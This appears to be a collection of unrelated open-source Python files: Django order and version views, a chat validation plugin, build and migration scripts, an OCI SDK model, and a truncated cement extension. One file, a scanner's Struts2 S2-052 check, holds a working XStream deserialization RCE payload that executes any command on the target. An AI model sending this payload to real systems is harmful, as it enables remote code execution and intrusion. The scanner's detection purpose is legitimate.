permission_classes = (permissions.CanViewOrdersPermission,)
queryset = models.DbOrdersExecuteTasks.objects.all()
serializer_class = serializers.GetTasksResultSerializer
lookup_field = 'id'
def get(self, request, *args, **kwargs):
queryset = self.get_object()
serializer = self.get_serializer(queryset, context={"request": request})
return JsonResponseV1(data=serializer.data)
class HookSqlOrdersView(APIView):
permission_classes = (permissions.anyof(permissions.CanCommitOrdersPermission,
permissions.CanViewOrdersPermission,
permissions.CanExecuteOrdersPermission,
permissions.CanAuditOrdersPermission),
)
def post(self, request, *args, **kwargs):
serializer = serializers.HookSqlOrdersSerializer(data=request.data)
if serializer.is_valid():
serializer.save()
return JsonResponseV1(message="任务提交成功,请查看输出")
return JsonResponseV1(message=serializer.errors, code='0001', flat=True)
class DownloadExportFilesView(APIView):
"""下载导出文件"""
permission_classes = (permissions.CanViewOrdersPermission,)
def get(self, request, base64_filename):
file_name = base64.b64decode(base64_filename).decode()
if not models.DbExportFiles.objects.filter(file_name=file_name).exists():
raise Http404
obj = models.DbExportFiles.objects.get(file_name=file_name)
if not models.DbOrdersExecuteTasks.objects.get(pk=obj.task_id).applicant == request.user.username:
raise PermissionDenied(detail='您没有权限')
fsock = open(f"media/{obj.files}", 'rb')
response = HttpResponse(fsock, content_type="application/zip")
response['Content-Disposition'] = f'attachment; filename={file_name}'
return response
class ReleaseVersionsGet(APIView):
"""获取上线版本号,提交工单使用"""
def get(self, request):
before_30_days = (timezone.now() - datetime.timedelta(days=30))
queryset = models.ReleaseVersions.objects.filter(
expire_time__gte=before_30_days
).values('id', 'version', 'expire_time').order_by('-created_at')
for row in queryset:
row['disabled'] = 0
if row['expire_time'] < datetime.datetime.date(timezone.now()):
row['disabled'] = 1
return JsonResponseV1(data=queryset)
class ReleaseVersionsList(ListAPIView):
"""获取上线版本号列表,管理上线版本号使用"""
permission_classes = (permissions.CanViewVersionPermission,)
queryset = models.ReleaseVersions.objects.all()
serializer_class = serializers.ReleaseVersionsListSerializer
pagination_class = Pagination
filter_backends = [filters.SearchFilter, filters.OrderingFilter]
search_fields = ['username', 'version', 'expire_time']
ordering = ['-created_at']
def get(self, request, *args, **kwargs):
queryset = self.filter_queryset(self.get_queryset())
page = self.paginate_queryset(queryset)
serializer = self.get_serializer(page, many=True)
render_columns = [
{'key': 'version', 'value': '版本'},
{'key': 'username', 'value': '创建人'},
{'key': 'expire_time', 'value': '截止日期'},
{'key': 'created_at', 'value': '创建时间'},
{'key': 'key', 'value': '操作'},
{'key': 'id', 'value': '详情'},
]
columns = render_dynamic_columns(render_columns)
data = {'columns': columns, 'data': serializer.data}
return self.get_paginated_response(data)
class ReleaseVersionsCreate(CreateAPIView):
"""创建版本"""
permission_classes = (permissions.CanCreateVersionsPermission,)
serializer_class = serializers.ReleaseVersionsCreateSerializer
def create(self, request, *args, **kwargs):
serializer = self.get_serializer(data=request.data)
if serializer.is_valid():
self.perform_create(serializer)
return JsonResponseV1(message="创建成功")
return JsonResponseV1(code='0001', message=serializer.errors, flat=True)
class ReleaseVersionsUpdate(UpdateAPIView):
"""更新版本号,该类只更新单条记录"""
permission_classes = (permissions.CanUpdateVersionsPermission,)
def put(self, request, *args, **kwargs):
serializer = serializers.ReleaseVersionsSerializer(
            instance=models.ReleaseVersions.objects.get(pk=kwargs['key']),  # returns a single record
data=request.data
)
if serializer.is_valid():
serializer.save()
return JsonResponseV1(message="更新成功")
return JsonResponseV1(code='0001', message=serializer.errors, flat=True)
class ReleaseVersionsDelete(DestroyAPIView):
"""删除版本"""
permission_classes = (permissions.CanDeleteVersionsPermission,)
queryset = models.ReleaseVersions.objects.all()
    lookup_field = 'id'  # defaults to the primary key; may be omitted
def destroy(self, request, *args, **kwargs):
instance = self.get_object()
self.perform_destroy(instance)
return JsonResponseV1(message="删除成功")
class ReleaseVersionsView(APIView):
"""获取指定版本内工单在所有环境的进度"""
def get(self, request, *args, **kwargs):
        # Get the primary key corresponding to the version
version = kwargs.get('version')
version_id = models.ReleaseVersions.objects.get(version=version).pk
        # Get the environments and pivot the rows into dynamic columns
obj = models.DbEnvironment.objects.values('id', 'name')
row2columns = ''
for row in obj:
row2columns += f"max(if(env_id={row['id']}, progress, -1)) as {row['name']},"
        # Get the status of every order in this version in each environment;
        # the environment columns are dynamic. The id column has no real meaning here.
query = f"select " + row2columns + \
f"substring(MD5(RAND()),1,20) as id,title as escape_title,order_id, applicant " \
f"from yasql_dborders where version_id='{version_id}' group by escape_title,order_id,applicant"
rawquery = models.DbOrders.objects.raw(query)
        # Get the environment column names
dynamic_columns = list(rawquery.columns)[:-4]
data = []
for row in rawquery:
columns = {
'id': row.id,
'escape_title': row.escape_title,
'order_id': row.order_id,
'applicant': row.applicant,
}
for col in dynamic_columns:
columns[col] = getattr(row, col)
data.append(columns)
render_columns = [
{'key': 'escape_title', 'ellipsis': True, 'value': '标题'},
{'key': 'applicant', 'value': '申请人'},
]
render_columns.extend([{'key': x, 'value': x} for x in dynamic_columns])
columns = render_dynamic_columns(render_columns)
data = {'columns': columns, 'data': data}
return JsonResponseV1(data=data)
|
dino/validation/events/message/limit_msg_length.py | thenetcircle/dino | 150 | 8490 | <reponame>thenetcircle/dino
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import logging
import traceback
from yapsy.IPlugin import IPlugin
from activitystreams.models.activity import Activity
from dino import utils
from dino.config import ErrorCodes
from dino.config import ConfigKeys
from dino.environ import GNEnvironment
logger = logging.getLogger(__name__)
__author__ = '<NAME> <<EMAIL>>'
class OnMessageCheckContentLength(IPlugin):
def __init__(self):
super(OnMessageCheckContentLength, self).__init__()
self.env = None
self.enabled = False
self.max_length = 1000
def setup(self, env: GNEnvironment):
self.env = env
validation_config = self.env.config.get(ConfigKeys.VALIDATION)
if 'on_message' not in validation_config or 'limit_msg_length' not in validation_config.get('on_message'):
            logger.info('no config enabled for plugin limit_msg_length, ignoring plugin')
return
on_create_config = validation_config.get('on_message').get('limit_msg_length')
self.enabled = True
self.max_length = on_create_config.get(ConfigKeys.MAX_MSG_LENGTH, 1000)
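        # A hedged sketch of the YAML fragment that would enable this plugin (the key
        # names mirror the lookups above; ConfigKeys.VALIDATION / MAX_MSG_LENGTH are
        # assumed to resolve to 'validation' / 'max_msg_length'):
        #
        #   validation:
        #     on_message:
        #       limit_msg_length:
        #         max_msg_length: 1000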
def _process(self, data: dict, activity: Activity):
message = activity.object.content
if message is None or len(message.strip()) == 0:
return True, None, None
if not utils.is_base64(message):
return False, ErrorCodes.NOT_BASE64, \
'invalid message content, not base64 encoded'
message = utils.b64d(message)
if len(message) > self.max_length:
return False, ErrorCodes.MSG_TOO_LONG, \
'message content needs to be shorter than %s characters' % self.max_length
return True, None, None
def __call__(self, *args, **kwargs) -> (bool, str):
if not self.enabled:
return
data, activity = args[0], args[1]
try:
return self._process(data, activity)
except Exception as e:
            logger.error('could not execute plugin limit_msg_length: %s' % str(e))
logger.exception(traceback.format_exc())
            return False, ErrorCodes.VALIDATION_ERROR, 'could not execute validation plugin limit_msg_length'
|
testing/scripts/checklicenses.py | zealoussnow/chromium | 14,668 | 8497 | <reponame>zealoussnow/chromium
#!/usr/bin/env python
# Copyright 2015 The Chromium Authors. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
import json
import os
import sys
import common
def main_run(args):
with common.temporary_file() as tempfile_path:
rc = common.run_command([
os.path.join(common.SRC_DIR, 'tools', 'checklicenses',
'checklicenses.py'),
'--json', tempfile_path
])
with open(tempfile_path) as f:
checklicenses_results = json.load(f)
result_set = set()
for result in checklicenses_results:
result_set.add((result['filename'], result['license']))
json.dump({
'valid': True,
'failures': ['%s: %s' % (r[0], r[1]) for r in result_set],
}, args.output)
return rc
def main_compile_targets(args):
json.dump([], args.output)
if __name__ == '__main__':
funcs = {
'run': main_run,
'compile_targets': main_compile_targets,
}
sys.exit(common.run_script(sys.argv[1:], funcs))
|
python/app/plugins/http/Struts2/S2_052.py | taomujian/linbing | 351 | 8513 | #!/usr/bin/env python3
from app.lib.utils.request import request
from app.lib.utils.encode import base64encode
from app.lib.utils.common import get_capta, get_useragent
class S2_052_BaseVerify:
def __init__(self, url):
self.info = {
'name': 'S2-052漏洞,又名CVE-2017-9805漏洞',
'description': 'Struts2 Remote Code Execution Vulnerability, Struts 2.1.6 - Struts 2.3.33, Struts 2.5 - Struts 2.5.12',
'date': '2017-09-05',
'exptype': 'check',
'type': 'RCE'
}
self.url = url
if not self.url.startswith("http") and not self.url.startswith("https"):
self.url = "http://" + self.url
self.capta = get_capta()
self.headers = {
'User-Agent': get_useragent(),
'Content-Type': "application/xml",
}
self.payload ='''
<map>
<entry>
<jdk.nashorn.internal.objects.NativeString>
<flags>0</flags>
<value class="com.sun.xml.internal.bind.v2.runtime.unmarshaller.Base64Data">
<dataHandler>
<dataSource class="com.sun.xml.internal.ws.encoding.xml.XMLMessage$XmlDataSource">
<is class="javax.crypto.CipherInputStream">
<cipher class="javax.crypto.NullCipher">
<initialized>false</initialized>
<opmode>0</opmode>
<serviceIterator class="javax.imageio.spi.FilterIterator">
<iter class="javax.imageio.spi.FilterIterator">
<iter class="java.util.Collections$EmptyIterator"/>
<next class="java.lang.ProcessBuilder">
<command>
{cmd}
</command>
<redirectErrorStream>false</redirectErrorStream>
</next>
</iter>
<filter class="javax.imageio.ImageIO$ContainsFilter">
<method>
<class>java.lang.ProcessBuilder</class>
<name>start</name>
<parameter-types/>
</method>
<name>foo</name>
</filter>
<next class="string">foo</next>
</serviceIterator>
<lock/>
</cipher>
<input class="java.lang.ProcessBuilder$NullInputStream"/>
<ibuffer></ibuffer>
<done>false</done>
<ostart>0</ostart>
<ofinish>0</ofinish>
<closed>false</closed>
</is>
<consumed>false</consumed>
</dataSource>
<transferFlavors/>
</dataHandler>
<dataLen>0</dataLen>
</value>
</jdk.nashorn.internal.objects.NativeString>
<jdk.nashorn.internal.objects.NativeString reference="../jdk.nashorn.internal.objects.NativeString"/>
</entry>
<entry>
<jdk.nashorn.internal.objects.NativeString reference="../../entry/jdk.nashorn.internal.objects.NativeString"/>
<jdk.nashorn.internal.objects.NativeString reference="../../entry/jdk.nashorn.internal.objects.NativeString"/>
</entry>
</map>
'''
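    # Descriptive note: the XML above is an XStream deserialization gadget chain for the
    # Struts 2 REST plugin; check() substitutes the {cmd} placeholder, and on a vulnerable
    # endpoint deserialization ends up invoking ProcessBuilder.start() with that command.
    # check() then treats an HTTP 500 response containing "java.security.Provider$Service"
    # as the vulnerable signature.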
def check(self):
"""
检测是否存在漏洞
:param:
:return bool True or False: 是否存在漏洞
"""
try:
self.check_payload = self.payload.format(cmd = '<string>calc</string>')
check_req = request.post(self.url, headers = self.headers, data = self.check_payload)
if check_req.status_code == 500 and 'java.security.Provider$Service' in check_req.text:
return True
else:
return False
except Exception as e:
print(e)
return False
finally:
pass
if __name__ == "__main__":
S2_052 = S2_052_BaseVerify('http://127.0.0.1:8088/struts2_rest_showcase_war_exploded/orders/3') |
stores/apps/inventory/migrations/0001_initial.py | diassor/CollectorCity-Market-Place | 135 | 8560 | # encoding: utf-8
import datetime
from south.db import db
from south.v2 import SchemaMigration
from django.db import models
class Migration(SchemaMigration):
def forwards(self, orm):
# Adding model 'ProductType'
db.create_table('inventory_producttype', (
('id', self.gf('django.db.models.fields.AutoField')(primary_key=True)),
))
db.send_create_signal('inventory', ['ProductType'])
# Adding model 'Product'
db.create_table('inventory_product', (
('id', self.gf('django.db.models.fields.AutoField')(primary_key=True)),
('shop', self.gf('django.db.models.fields.related.ForeignKey')(to=orm['shops.Shop'])),
('title', self.gf('django.db.models.fields.CharField')(max_length=200)),
('description', self.gf('django.db.models.fields.TextField')()),
('category', self.gf('django.db.models.fields.related.ForeignKey')(to=orm['market.MarketCategory'])),
('subcategory', self.gf('django.db.models.fields.related.ForeignKey')(to=orm['market.MarketSubCategory'])),
('date_time', self.gf('django.db.models.fields.DateTimeField')(auto_now_add=True, blank=True)),
('weight', self.gf('django.db.models.fields.DecimalField')(default='0', max_digits=11, decimal_places=2)),
('type', self.gf('django.db.models.fields.related.ForeignKey')(to=orm['inventory.ProductType'], null=True, blank=True)),
))
db.send_create_signal('inventory', ['Product'])
# Adding model 'Coin'
db.create_table('inventory_coin', (
('producttype_ptr', self.gf('django.db.models.fields.related.OneToOneField')(to=orm['inventory.ProductType'], unique=True, primary_key=True)),
('category', self.gf('django.db.models.fields.related.ForeignKey')(to=orm['market.MarketCategory'], null=True, blank=True)),
('subcategory', self.gf('django.db.models.fields.related.ForeignKey')(to=orm['market.MarketSubCategory'], null=True, blank=True)),
('country_code', self.gf('django.db.models.fields.CharField')(default='us', max_length=2)),
('pcgs_number', self.gf('django.db.models.fields.IntegerField')(null=True, blank=True)),
('description', self.gf('django.db.models.fields.TextField')(default='', blank='')),
('year_issued', self.gf('django.db.models.fields.CharField')(default='', max_length=24, blank='')),
('actual_year', self.gf('django.db.models.fields.CharField')(default='', max_length=24, blank='')),
('denomination', self.gf('django.db.models.fields.CharField')(default='', max_length=60, blank='')),
('major_variety', self.gf('django.db.models.fields.CharField')(default='', max_length=60, blank='')),
('die_variety', self.gf('django.db.models.fields.CharField')(default='', max_length=60, blank='')),
('prefix', self.gf('django.db.models.fields.CharField')(default='', max_length=60, blank='')),
('suffix', self.gf('django.db.models.fields.CharField')(default='', max_length=60, blank='')),
('sort_order', self.gf('django.db.models.fields.CharField')(default='', max_length=60, blank='')),
('heading', self.gf('django.db.models.fields.CharField')(default='', max_length=60, blank='')),
('holder_variety', self.gf('django.db.models.fields.CharField')(default='', max_length=60, blank='')),
('holder_variety_2', self.gf('django.db.models.fields.CharField')(default='', max_length=60, blank='')),
('additional_data', self.gf('django.db.models.fields.TextField')(default='', blank='')),
('last_update', self.gf('django.db.models.fields.DateTimeField')(auto_now=True, blank=True)),
))
db.send_create_signal('inventory', ['Coin'])
def backwards(self, orm):
# Deleting model 'ProductType'
db.delete_table('inventory_producttype')
# Deleting model 'Product'
db.delete_table('inventory_product')
# Deleting model 'Coin'
db.delete_table('inventory_coin')
models = {
'auth.group': {
'Meta': {'object_name': 'Group'},
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '80'}),
'permissions': ('django.db.models.fields.related.ManyToManyField', [], {'to': "orm['auth.Permission']", 'symmetrical': 'False', 'blank': 'True'})
},
'auth.permission': {
'Meta': {'unique_together': "(('content_type', 'codename'),)", 'object_name': 'Permission'},
'codename': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'content_type': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['contenttypes.ContentType']"}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '50'})
},
'auth.user': {
'Meta': {'object_name': 'User'},
'date_joined': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'email': ('django.db.models.fields.EmailField', [], {'max_length': '75'}),
'first_name': ('django.db.models.fields.CharField', [], {'max_length': '30', 'blank': 'True'}),
'groups': ('django.db.models.fields.related.ManyToManyField', [], {'to': "orm['auth.Group']", 'symmetrical': 'False', 'blank': 'True'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'is_active': ('django.db.models.fields.BooleanField', [], {'default': 'True', 'blank': 'True'}),
'is_staff': ('django.db.models.fields.BooleanField', [], {'default': 'False', 'blank': 'True'}),
'is_superuser': ('django.db.models.fields.BooleanField', [], {'default': 'False', 'blank': 'True'}),
'last_login': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'last_name': ('django.db.models.fields.CharField', [], {'max_length': '30', 'blank': 'True'}),
            'password': ('django.db.models.fields.CharField', [], {'max_length': '128'}),
'user_permissions': ('django.db.models.fields.related.ManyToManyField', [], {'to': "orm['auth.Permission']", 'symmetrical': 'False', 'blank': 'True'}),
'username': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '32'})
},
'contenttypes.contenttype': {
'Meta': {'unique_together': "(('app_label', 'model'),)", 'object_name': 'ContentType', 'db_table': "'django_content_type'"},
'app_label': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'model': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '100'})
},
'inventory.coin': {
'Meta': {'object_name': 'Coin', '_ormbases': ['inventory.ProductType']},
'actual_year': ('django.db.models.fields.CharField', [], {'default': "''", 'max_length': '24', 'blank': "''"}),
'additional_data': ('django.db.models.fields.TextField', [], {'default': "''", 'blank': "''"}),
'category': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['market.MarketCategory']", 'null': 'True', 'blank': 'True'}),
'country_code': ('django.db.models.fields.CharField', [], {'default': "'us'", 'max_length': '2'}),
'denomination': ('django.db.models.fields.CharField', [], {'default': "''", 'max_length': '60', 'blank': "''"}),
'description': ('django.db.models.fields.TextField', [], {'default': "''", 'blank': "''"}),
'die_variety': ('django.db.models.fields.CharField', [], {'default': "''", 'max_length': '60', 'blank': "''"}),
'heading': ('django.db.models.fields.CharField', [], {'default': "''", 'max_length': '60', 'blank': "''"}),
'holder_variety': ('django.db.models.fields.CharField', [], {'default': "''", 'max_length': '60', 'blank': "''"}),
'holder_variety_2': ('django.db.models.fields.CharField', [], {'default': "''", 'max_length': '60', 'blank': "''"}),
'last_update': ('django.db.models.fields.DateTimeField', [], {'auto_now': 'True', 'blank': 'True'}),
'major_variety': ('django.db.models.fields.CharField', [], {'default': "''", 'max_length': '60', 'blank': "''"}),
'pcgs_number': ('django.db.models.fields.IntegerField', [], {'null': 'True', 'blank': 'True'}),
'prefix': ('django.db.models.fields.CharField', [], {'default': "''", 'max_length': '60', 'blank': "''"}),
'producttype_ptr': ('django.db.models.fields.related.OneToOneField', [], {'to': "orm['inventory.ProductType']", 'unique': 'True', 'primary_key': 'True'}),
'sort_order': ('django.db.models.fields.CharField', [], {'default': "''", 'max_length': '60', 'blank': "''"}),
'subcategory': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['market.MarketSubCategory']", 'null': 'True', 'blank': 'True'}),
'suffix': ('django.db.models.fields.CharField', [], {'default': "''", 'max_length': '60', 'blank': "''"}),
'year_issued': ('django.db.models.fields.CharField', [], {'default': "''", 'max_length': '24', 'blank': "''"})
},
'inventory.product': {
'Meta': {'object_name': 'Product'},
'category': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['market.MarketCategory']"}),
'date_time': ('django.db.models.fields.DateTimeField', [], {'auto_now_add': 'True', 'blank': 'True'}),
'description': ('django.db.models.fields.TextField', [], {}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'shop': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['shops.Shop']"}),
'subcategory': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['market.MarketSubCategory']"}),
'title': ('django.db.models.fields.CharField', [], {'max_length': '200'}),
'type': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['inventory.ProductType']", 'null': 'True', 'blank': 'True'}),
'weight': ('django.db.models.fields.DecimalField', [], {'default': "'0'", 'max_digits': '11', 'decimal_places': '2'})
},
'inventory.producttype': {
'Meta': {'object_name': 'ProductType'},
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'})
},
'market.marketcategory': {
'Meta': {'object_name': 'MarketCategory'},
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'marketplace': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['market.MarketPlace']"}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '60'}),
'order': ('django.db.models.fields.IntegerField', [], {'default': '255'}),
'slug': ('django.db.models.fields.SlugField', [], {'unique': 'True', 'max_length': '60', 'db_index': 'True'})
},
'market.marketplace': {
'Meta': {'object_name': 'MarketPlace'},
'base_domain': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '128'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '92'}),
'slug': ('django.db.models.fields.SlugField', [], {'unique': 'True', 'max_length': '92', 'db_index': 'True'}),
'template_prefix': ('django.db.models.fields.SlugField', [], {'unique': 'True', 'max_length': '92', 'db_index': 'True'}),
'title': ('django.db.models.fields.CharField', [], {'max_length': '92'})
},
'market.marketsubcategory': {
'Meta': {'unique_together': "(('parent', 'slug'),)", 'object_name': 'MarketSubCategory'},
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'marketplace': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['market.MarketPlace']"}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '60'}),
'order': ('django.db.models.fields.IntegerField', [], {'default': '255'}),
'parent': ('django.db.models.fields.related.ForeignKey', [], {'blank': 'True', 'related_name': "'subcategories'", 'null': 'True', 'to': "orm['market.MarketCategory']"}),
'slug': ('django.db.models.fields.SlugField', [], {'max_length': '60', 'db_index': 'True'})
},
'shops.shop': {
'Meta': {'object_name': 'Shop'},
'admin': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['auth.User']"}),
'bids': ('django.db.models.fields.IntegerField', [], {'default': '0'}),
'date_time': ('django.db.models.fields.DateTimeField', [], {'auto_now_add': 'True', 'blank': 'True'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'location': ('django.db.models.fields.CharField', [], {'default': "'39.29038,-76.61219'", 'max_length': '255'}),
'marketplace': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['market.MarketPlace']"}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '60'}),
'views': ('django.db.models.fields.IntegerField', [], {'default': '0'})
}
}
complete_apps = ['inventory']
|
src/oci/management_agent/models/management_agent_aggregation_dimensions.py | CentroidChef/oci-python-sdk | 249 | 8563 | # coding: utf-8
# Copyright (c) 2016, 2021, Oracle and/or its affiliates. All rights reserved.
# This software is dual-licensed to you under the Universal Permissive License (UPL) 1.0 as shown at https://oss.oracle.com/licenses/upl or Apache License 2.0 as shown at http://www.apache.org/licenses/LICENSE-2.0. You may choose either license.
from oci.util import formatted_flat_dict, NONE_SENTINEL, value_allowed_none_or_none_sentinel # noqa: F401
from oci.decorators import init_model_state_from_kwargs
@init_model_state_from_kwargs
class ManagementAgentAggregationDimensions(object):
"""
The Aggregation of Management Agent Dimensions
"""
#: A constant which can be used with the availability_status property of a ManagementAgentAggregationDimensions.
#: This constant has a value of "ACTIVE"
AVAILABILITY_STATUS_ACTIVE = "ACTIVE"
#: A constant which can be used with the availability_status property of a ManagementAgentAggregationDimensions.
#: This constant has a value of "SILENT"
AVAILABILITY_STATUS_SILENT = "SILENT"
#: A constant which can be used with the availability_status property of a ManagementAgentAggregationDimensions.
#: This constant has a value of "NOT_AVAILABLE"
AVAILABILITY_STATUS_NOT_AVAILABLE = "NOT_AVAILABLE"
#: A constant which can be used with the platform_type property of a ManagementAgentAggregationDimensions.
#: This constant has a value of "LINUX"
PLATFORM_TYPE_LINUX = "LINUX"
#: A constant which can be used with the platform_type property of a ManagementAgentAggregationDimensions.
#: This constant has a value of "WINDOWS"
PLATFORM_TYPE_WINDOWS = "WINDOWS"
#: A constant which can be used with the install_type property of a ManagementAgentAggregationDimensions.
#: This constant has a value of "AGENT"
INSTALL_TYPE_AGENT = "AGENT"
#: A constant which can be used with the install_type property of a ManagementAgentAggregationDimensions.
#: This constant has a value of "GATEWAY"
INSTALL_TYPE_GATEWAY = "GATEWAY"
def __init__(self, **kwargs):
"""
Initializes a new ManagementAgentAggregationDimensions object with values from keyword arguments.
The following keyword arguments are supported (corresponding to the getters/setters of this class):
:param availability_status:
The value to assign to the availability_status property of this ManagementAgentAggregationDimensions.
Allowed values for this property are: "ACTIVE", "SILENT", "NOT_AVAILABLE", 'UNKNOWN_ENUM_VALUE'.
Any unrecognized values returned by a service will be mapped to 'UNKNOWN_ENUM_VALUE'.
:type availability_status: str
:param platform_type:
The value to assign to the platform_type property of this ManagementAgentAggregationDimensions.
Allowed values for this property are: "LINUX", "WINDOWS", 'UNKNOWN_ENUM_VALUE'.
Any unrecognized values returned by a service will be mapped to 'UNKNOWN_ENUM_VALUE'.
:type platform_type: str
:param version:
The value to assign to the version property of this ManagementAgentAggregationDimensions.
:type version: str
:param has_plugins:
The value to assign to the has_plugins property of this ManagementAgentAggregationDimensions.
:type has_plugins: bool
:param install_type:
The value to assign to the install_type property of this ManagementAgentAggregationDimensions.
Allowed values for this property are: "AGENT", "GATEWAY", 'UNKNOWN_ENUM_VALUE'.
Any unrecognized values returned by a service will be mapped to 'UNKNOWN_ENUM_VALUE'.
:type install_type: str
"""
self.swagger_types = {
'availability_status': 'str',
'platform_type': 'str',
'version': 'str',
'has_plugins': 'bool',
'install_type': 'str'
}
self.attribute_map = {
'availability_status': 'availabilityStatus',
'platform_type': 'platformType',
'version': 'version',
'has_plugins': 'hasPlugins',
'install_type': 'installType'
}
self._availability_status = None
self._platform_type = None
self._version = None
self._has_plugins = None
self._install_type = None
@property
def availability_status(self):
"""
Gets the availability_status of this ManagementAgentAggregationDimensions.
The availability status of managementAgent
Allowed values for this property are: "ACTIVE", "SILENT", "NOT_AVAILABLE", 'UNKNOWN_ENUM_VALUE'.
Any unrecognized values returned by a service will be mapped to 'UNKNOWN_ENUM_VALUE'.
:return: The availability_status of this ManagementAgentAggregationDimensions.
:rtype: str
"""
return self._availability_status
@availability_status.setter
def availability_status(self, availability_status):
"""
Sets the availability_status of this ManagementAgentAggregationDimensions.
The availability status of managementAgent
:param availability_status: The availability_status of this ManagementAgentAggregationDimensions.
:type: str
"""
allowed_values = ["ACTIVE", "SILENT", "NOT_AVAILABLE"]
if not value_allowed_none_or_none_sentinel(availability_status, allowed_values):
availability_status = 'UNKNOWN_ENUM_VALUE'
self._availability_status = availability_status
@property
def platform_type(self):
"""
Gets the platform_type of this ManagementAgentAggregationDimensions.
Platform Type
Allowed values for this property are: "LINUX", "WINDOWS", 'UNKNOWN_ENUM_VALUE'.
Any unrecognized values returned by a service will be mapped to 'UNKNOWN_ENUM_VALUE'.
:return: The platform_type of this ManagementAgentAggregationDimensions.
:rtype: str
"""
return self._platform_type
@platform_type.setter
def platform_type(self, platform_type):
"""
Sets the platform_type of this ManagementAgentAggregationDimensions.
Platform Type
:param platform_type: The platform_type of this ManagementAgentAggregationDimensions.
:type: str
"""
allowed_values = ["LINUX", "WINDOWS"]
if not value_allowed_none_or_none_sentinel(platform_type, allowed_values):
platform_type = 'UNKNOWN_ENUM_VALUE'
self._platform_type = platform_type
@property
def version(self):
"""
Gets the version of this ManagementAgentAggregationDimensions.
Agent image version
:return: The version of this ManagementAgentAggregationDimensions.
:rtype: str
"""
return self._version
@version.setter
def version(self, version):
"""
Sets the version of this ManagementAgentAggregationDimensions.
Agent image version
:param version: The version of this ManagementAgentAggregationDimensions.
:type: str
"""
self._version = version
@property
def has_plugins(self):
"""
Gets the has_plugins of this ManagementAgentAggregationDimensions.
Whether or not a managementAgent has at least one plugin
:return: The has_plugins of this ManagementAgentAggregationDimensions.
:rtype: bool
"""
return self._has_plugins
@has_plugins.setter
def has_plugins(self, has_plugins):
"""
Sets the has_plugins of this ManagementAgentAggregationDimensions.
Whether or not a managementAgent has at least one plugin
:param has_plugins: The has_plugins of this ManagementAgentAggregationDimensions.
:type: bool
"""
self._has_plugins = has_plugins
@property
def install_type(self):
"""
Gets the install_type of this ManagementAgentAggregationDimensions.
The install type, either AGENT or GATEWAY
Allowed values for this property are: "AGENT", "GATEWAY", 'UNKNOWN_ENUM_VALUE'.
Any unrecognized values returned by a service will be mapped to 'UNKNOWN_ENUM_VALUE'.
:return: The install_type of this ManagementAgentAggregationDimensions.
:rtype: str
"""
return self._install_type
@install_type.setter
def install_type(self, install_type):
"""
Sets the install_type of this ManagementAgentAggregationDimensions.
The install type, either AGENT or GATEWAY
:param install_type: The install_type of this ManagementAgentAggregationDimensions.
:type: str
"""
allowed_values = ["AGENT", "GATEWAY"]
if not value_allowed_none_or_none_sentinel(install_type, allowed_values):
install_type = 'UNKNOWN_ENUM_VALUE'
self._install_type = install_type
def __repr__(self):
return formatted_flat_dict(self)
def __eq__(self, other):
if other is None:
return False
return self.__dict__ == other.__dict__
def __ne__(self, other):
return not self == other
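# Illustrative usage sketch (not part of the OCI SDK source): shows how the keyword
# arguments documented in ``__init__`` map onto properties and how the setters coerce
# values outside the allowed enum lists. All values below are example data.
if __name__ == "__main__":
    dims = ManagementAgentAggregationDimensions(
        availability_status="ACTIVE",
        platform_type="LINUX",
        version="210101.0101",
        has_plugins=True,
        install_type="AGENT",
    )
    # Values outside the allowed list are mapped to 'UNKNOWN_ENUM_VALUE' by the setter.
    dims.platform_type = "SOLARIS"
    print(dims)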
|
cement/ext/ext_generate.py | tomekr/cement | 826 | 8583 | """
Cement generate extension module.
"""
import re
import os
import inspect
import yaml
import shutil
from .. import Controller, minimal_logger, shell
from ..utils.version import VERSION, get_version
LOG = minimal_logger(__name__)
class GenerateTemplateAbstractBase(Controller):
class Meta:
pass
def _generate(self, source, dest):
msg = 'Generating %s %s in %s' % (
self.app._meta.label, self._meta.label, dest
)
self.app.log.info(msg)
data = {}
# builtin vars
maj_min = float('%s.%s' % (VERSION[0], VERSION[1]))
data['cement'] = {}
